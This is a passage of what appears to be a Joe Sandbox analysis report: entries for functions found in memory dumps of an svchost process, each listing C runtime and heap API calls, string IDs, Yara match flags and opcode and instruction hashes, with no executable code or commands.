                                                                                                              • Instruction Fuzzy Hash: ABF0F431800259A6DB04EB94EDD4AAD7BFEAF42F18F14001AE4019A4D0CFB1D9E08F94
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 04C7F130
                                                                                                                • Part of subcall function 04C7F082: __FF_MSGBANNER.LIBCMT ref: 04C7F09B
                                                                                                                • Part of subcall function 04C7F082: __NMSG_WRITE.LIBCMT ref: 04C7F0A2
                                                                                                              • std::exception::exception.LIBCMT ref: 04C7F165
                                                                                                              • std::exception::exception.LIBCMT ref: 04C7F17F
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 04C7F190
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 2388904642-0
                                                                                                              • Opcode ID: 7daa1a2e8a1edc39e4a8b0fa374d655afe2b4b7aab490ef2bd333e68d320cb02
                                                                                                              • Instruction ID: 43f572c7e39f586dcad465dc428dc626e0798710e9f0f6547a7e8cf0e0b3be2f
                                                                                                              • Opcode Fuzzy Hash: 7daa1a2e8a1edc39e4a8b0fa374d655afe2b4b7aab490ef2bd333e68d320cb02
                                                                                                              • Instruction Fuzzy Hash: 89F02876500219ABEB00FB59DC949AE7BABEB04288FD4402DD50496190DB71E602DB50
                                                                                                              APIs
                                                                                                                • Part of subcall function 02581420: HeapFree.KERNEL32(?,00000000,?,?,?,025840A1,?,00000000,02584029,?,7591DFA0,02583628), ref: 0258143D
                                                                                                                • Part of subcall function 02581420: _free.LIBCMT ref: 02581459
                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 02586573
                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 02586585
                                                                                                              • _free.LIBCMT ref: 02586595
                                                                                                              • HeapDestroy.KERNEL32 ref: 025865C2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4097506873-0
                                                                                                              • Opcode ID: e1f47d0f5c78f3ba68d6e1cac6c56751833c67353fda5955b196d4dff860c08c
                                                                                                              • Instruction ID: fbcaeabf34f40b9c713ce30f2746e584b88c46202fe4d75da73cc7f3f11b9d94
                                                                                                              • Opcode Fuzzy Hash: e1f47d0f5c78f3ba68d6e1cac6c56751833c67353fda5955b196d4dff860c08c
                                                                                                              • Instruction Fuzzy Hash: EDF0AFB55007029BD310AF24E808B23BBF8FF84710F51481CE85993240DB74F825CF90
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF1420: HeapFree.KERNEL32(?,00000000,?,?,?,04DF40B1,?,00000000,04DF4039,?,7591DFA0,04DF3648), ref: 04DF143D
                                                                                                                • Part of subcall function 04DF1420: _free.LIBCMT ref: 04DF1459
                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 04DFCDE3
                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 04DFCDF5
                                                                                                              • _free.LIBCMT ref: 04DFCE05
                                                                                                              • HeapDestroy.KERNEL32 ref: 04DFCE32
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                              • String ID:
                                                                                                              • API String ID: 4097506873-0
                                                                                                              • Opcode ID: 078bd04cc834ea6eaf439bdb1134f4ffbf2320569d852a22118ed23267623185
                                                                                                              • Instruction ID: c37dbd8064fe73f1108fe159d5b6cce6d4bc8dba9506345fd7c5fb6d7dd5c316
                                                                                                              • Opcode Fuzzy Hash: 078bd04cc834ea6eaf439bdb1134f4ffbf2320569d852a22118ed23267623185
                                                                                                              • Instruction Fuzzy Hash: 88F0AFB5200602ABE320AF25E808B57FBB8FF88B11F11851CE955C7200DB38F854CBA0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                              • String ID:
                                                                                                              • API String ID: 865245655-0
                                                                                                              • Opcode ID: d35f9130b0fb932ae7d1da433330ecf3e9bae56744771b6e30fbfe98e25e9986
                                                                                                              • Instruction ID: a24cac9c6a284c12eb9d8f85ac33be9fcdff7fac5a84baa7140c5fca1d6c81e4
                                                                                                              • Opcode Fuzzy Hash: d35f9130b0fb932ae7d1da433330ecf3e9bae56744771b6e30fbfe98e25e9986
                                                                                                              • Instruction Fuzzy Hash: 28F06278640241BBC704AFB0EAC880F7BAEAF88748720C454E9458B292DE35D8468EA1

APIs
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: ___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 865245655-0
• Opcode ID: 9e7d94f6b78f27a75255a1ae6a0e5eac7466ec8d6979fea6d65de3141a961281
• Instruction ID: 83c9321d2a408bea1259aa2187201295b8de69f44c5ea41480ea690ce532a84d
• Opcode Fuzzy Hash: 9e7d94f6b78f27a75255a1ae6a0e5eac7466ec8d6979fea6d65de3141a961281
• Instruction Fuzzy Hash: B8F06274540295AFE704BF65C98480A7BAABF4424C325845CEC048B321DA35E8469AA1

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: _free_malloc
• String ID: &
• API String ID: 845055658-3042966939
• Opcode ID: 5e5b5c576005100c852a822884550fadc31d97c59bbf8ecacd7d3e80cca5e8cf
• Instruction ID: cc030dd99ed6aa41c8ccce9d79270763f1cb7e980d5b511fbb92ba3345acf7dd
• Opcode Fuzzy Hash: 5e5b5c576005100c852a822884550fadc31d97c59bbf8ecacd7d3e80cca5e8cf
• Instruction Fuzzy Hash: 415156B1E001199FEB00EFA5C885EEEB7BAFF48314F148559E905B7250D734BA05CBA1

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: _memset_wcsrchr
• String ID: D
• API String ID: 1675014779-2746444292
• Opcode ID: 90e19d66a76d93ebeaa59610f971ef365756e86a1b872d1638bf4d682c6e4523
• Instruction ID: 1d153bb9ad98db88415313e3f4bb7f34c5f4ed1787f1fe1379fbfb28a541cf71
• Opcode Fuzzy Hash: 90e19d66a76d93ebeaa59610f971ef365756e86a1b872d1638bf4d682c6e4523
• Instruction Fuzzy Hash: AC31FD72A402187BF720ABA4DC8AFFF777DEB45710F104129FB05AA1C4DA716A0587A1

APIs
• __CxxThrowException@8.LIBCMT ref: 04DF946D
• std::_Xinvalid_argument.LIBCPMT ref: 04DF949A
Strings
• invalid string position, xrefs: 04DF9495
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: Exception@8ThrowXinvalid_argumentstd::_
• String ID: invalid string position
• API String ID: 3614006799-1799206989
• Opcode ID: 7fa41fb15548e43889cb742033b74a7be45777562fa7278cdf1a36f42e8a0745
• Instruction ID: b72bb886051ea95c1cc28af9b7ee3bce58a2f086a6df55f76728635b4385efcb
• Opcode Fuzzy Hash: 7fa41fb15548e43889cb742033b74a7be45777562fa7278cdf1a36f42e8a0745
• Instruction Fuzzy Hash: 670126727002005BE734AE78CC9079AF795EF50328F120E6DE6568B6C0DB71F94487A4

APIs
• __output_l.LIBCMT ref: 02A06AD2
  • Part of subcall function 02A06BBA: __getptd_noexit.LIBCMT ref: 02A06BBA
Strings
Memory Dump Source
• Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
Similarity
• API ID: __getptd_noexit__output_l
• String ID: B
• API String ID: 2141734944-1255198513
• Opcode ID: 0e9a39c42b97edeaacd553980931243230b40991fa9776e4ab0e03b5aae516e6
• Instruction ID: af086cc8045da83f5bad8805f3199dedb91249f5f6e6975f626d28c816ecfc30
• Opcode Fuzzy Hash: 0e9a39c42b97edeaacd553980931243230b40991fa9776e4ab0e03b5aae516e6
• Instruction Fuzzy Hash: 9801C0719002099FDF00AFA5EC80BEEBBF9FB08328F104155E924A62C0DB789551CBB5

APIs
• __output_l.LIBCMT ref: 04C7F224
  • Part of subcall function 04C7F32A: __getptd_noexit.LIBCMT ref: 04C7F32A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: __getptd_noexit__output_l
• String ID: B
• API String ID: 2141734944-1255198513
• Opcode ID: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
• Instruction ID: a32271eea08eafd5383befcfde67329c320242101ad0570cae17629ba125bd86
• Opcode Fuzzy Hash: 24d6c1a3e6102abc97be550d239efeb380074cf53a155cef3fbb89e81f64d6ff
• Instruction Fuzzy Hash: AD018471D002099FEF10DFA5DC40BEE7BF5FB04368F144119E924A6280E774A502DB71

APIs
• __output_l.LIBCMT ref: 02587105
  • Part of subcall function 025871ED: __getptd_noexit.LIBCMT ref: 025871ED
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: __getptd_noexit__output_l
• String ID: B
• API String ID: 2141734944-1255198513
• Opcode ID: 95d493ecf19bfc0a3d1b589b43083adfdb7a8b25648218124aa29c10e3d8faa5
• Instruction ID: 7ae054daadc69d83b992097a28247d0d6c6db1d9c6507000c324a3e73938d7a5
• Opcode Fuzzy Hash: 95d493ecf19bfc0a3d1b589b43083adfdb7a8b25648218124aa29c10e3d8faa5
• Instruction Fuzzy Hash: 39011B7690424A9FDF10AFA4CC05AFEBBB5FB48364F244155E924B6280D7B49501CF69

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 04DF95CF
  • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFEFEB
  • Part of subcall function 04DFEFD6: __CxxThrowException@8.LIBCMT ref: 04DFF000
  • Part of subcall function 04DFEFD6: std::exception::exception.LIBCMT ref: 04DFF011
• _memmove.LIBCMT ref: 04DF9605
Strings
• invalid string position, xrefs: 04DF95CA
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
• String ID: invalid string position
• API String ID: 1785806476-1799206989
• Opcode ID: 15deb8df2c794cf003be0d0c1b6f40d20846b01a13618dc52c3e95135e5c6c33
• Instruction ID: d41fce2e676036e3850992e2b4a091b1cc383979a3d564d75033e06bddb535fd
• Opcode Fuzzy Hash: 15deb8df2c794cf003be0d0c1b6f40d20846b01a13618dc52c3e95135e5c6c33
• Instruction Fuzzy Hash: 5A0184B1B042414BD735CF6CEDA871AB6E69BC0614B260DADD282C7B49E671FC428750

APIs
• std::_Xinvalid_argument.LIBCPMT ref: 04DF8493
  • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEF9E
  • Part of subcall function 04DFEF89: __CxxThrowException@8.LIBCMT ref: 04DFEFB3
  • Part of subcall function 04DFEF89: std::exception::exception.LIBCMT ref: 04DFEFC4
• _memmove.LIBCMT ref: 04DF84BE
Strings
Memory Dump Source
• Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
• Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
• String ID: vector<T> too long
• API String ID: 1785806476-3788999226
• Opcode ID: 9c7f475150b73ec5c1c53c181daa8a629723b8b4e943e95a468c3df7c0acc00c
• Instruction ID: 570b47f4ebbc945fc699d69abdfcbf459879fff233b9293e29d8aefc95922a6f
• Opcode Fuzzy Hash: 9c7f475150b73ec5c1c53c181daa8a629723b8b4e943e95a468c3df7c0acc00c
• Instruction Fuzzy Hash: 1901A2B17002069FDB34DFA8DC9192BB3E9EF54214315892EEA9BC7750E734F9008B61

APIs
• __getptd.LIBCMT ref: 02A13295
  • Part of subcall function 02A09348: __getptd_noexit.LIBCMT ref: 02A0934B
  • Part of subcall function 02A09348: __amsg_exit.LIBCMT ref: 02A09358
• __getptd.LIBCMT ref: 02A132A3
Strings
Memory Dump Source
• Source File: 00000004.00000002.3345070075.0000000002A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2a00000_svchost.jbxd
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• API String ID: 803148776-1018135373
• Opcode ID: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
• Instruction ID: e4a6481d59dc6135712346ebb103f73184cbaa80d7bd6705bcc35f344065d0c4
• Opcode Fuzzy Hash: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
• Instruction Fuzzy Hash: F60169348003858ACF38AF64D5807ADF3BABF21321F6448AED881AA690DF34D981CF41

APIs
• __getptd.LIBCMT ref: 04C91102
  • Part of subcall function 04C8386A: __getptd_noexit.LIBCMT ref: 04C8386D
  • Part of subcall function 04C8386A: __amsg_exit.LIBCMT ref: 04C8387A
• __getptd.LIBCMT ref: 04C91110
Strings
Memory Dump Source
• Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
Yara matches
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• API String ID: 803148776-1018135373
• Opcode ID: aba3be56db0cb330105e04e3fd05360b3ce0f0149d82b8a44c918ce0d40eef41
• Instruction ID: 5eaf216fb1571c663fae4836892d347f8cf5619dbda6495d86e9cf4cf6e4bd5f
• Opcode Fuzzy Hash: aba3be56db0cb330105e04e3fd05360b3ce0f0149d82b8a44c918ce0d40eef41
• Instruction Fuzzy Hash: 38016D39800307BAEF349F26C449AAEB3F7AF0065AF68456ED44156691CF36AE81DB01

APIs
  • Part of subcall function 0259339E: __getptd.LIBCMT ref: 025933A4
  • Part of subcall function 0259339E: __getptd.LIBCMT ref: 025933B4
• __getptd.LIBCMT ref: 025938C8
  • Part of subcall function 0258997B: __getptd_noexit.LIBCMT ref: 0258997E
  • Part of subcall function 0258997B: __amsg_exit.LIBCMT ref: 0258998B
• __getptd.LIBCMT ref: 025938D6
Strings
Memory Dump Source
• Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
• Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
Similarity
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• API String ID: 803148776-1018135373
• Opcode ID: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
• Instruction ID: 863907c4037d520eaed81345dd726c699dd8b2ca6a6688e3e0db03b866efd231
• Opcode Fuzzy Hash: b81fda4c84a4da75d5013dc174894f1bb50a21fbbe6e1ef4ba89ac83b3cd124b
• Instruction Fuzzy Hash: 80014B38C0060AEFCF349F22C4847ACBBB6BF44211F2444AED88696660CB708591CF49